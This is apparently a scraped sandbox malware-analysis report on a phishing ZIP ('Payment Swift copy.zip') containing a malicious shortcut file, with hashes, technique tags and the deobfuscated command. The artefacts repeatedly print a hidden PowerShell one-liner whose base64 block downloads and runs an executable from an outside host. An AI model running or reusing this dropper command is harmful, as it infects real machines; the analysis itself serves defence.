Malicious
Malicious

Payment Swift copy.zip

ZIP Archive
|
MD5: d1f009e2fd65b43f2eb917a772fbb8d6
|
Size: 2.54 KB
|
application/zip

Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Print
General
Structural Analysis
Config.0
Yara Rules85
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
d1f009e2fd65b43f2eb917a772fbb8d6
Sha1
bcdc298cdd7eba27cfad2f824860f94faadf9e24
Sha256
329ae4035bda94f3994dfc78d2bd771647e05cde4fe091ed076cea12f5831b81
Sha384
1f7f2fc25d5af3e7417aa70b4ebe7cd097e04ecfe85a4a131516c3e13cdd249727e268ee345e223cf6cb3e763b927f9e
Sha512
158a273d4278dc03e4f48dd570ccc3cf462f03b0370d3f6d05445472f1c75b690d74291357efbab5c1e9bb8ac7c124b017c71c89c2902150853a10699e9c1c56
SSDeep
48:9iywvVA1zu7+TuSS8kWZTaWnywvVA1zu7+TuSS8kWZTaWU:YZvVA1K7+TuSSETaeZvVA1K7+TuSSET8
TLSH
B351D7A0740F6D74ED8AA7BE6088E8A92C4560CC6E65FF18A0C1EE55695634807B835A
File Structure
Payment Swift copy.zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
Details of Transaction.lnk
Archive Entry
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Contains Base64 Block
Base64 Block
Powershell: Hidden Execution
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Contains Base64 Block
Base64 Block
Malicious
[Base64-Block]
Base64 Block
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Contains Base64 Block
Base64 Block
Malicious
[Lnk Summary]
PowerShell
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Contains Base64 Block
Base64 Block
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -NonInteractive -WindowStyle Hidden -NoProfile invoke-expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=')));
Deobfuscated PowerShell

-noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))
Deobfuscated PowerShell

-noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))
Payment Swift copy.zip (2.54 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙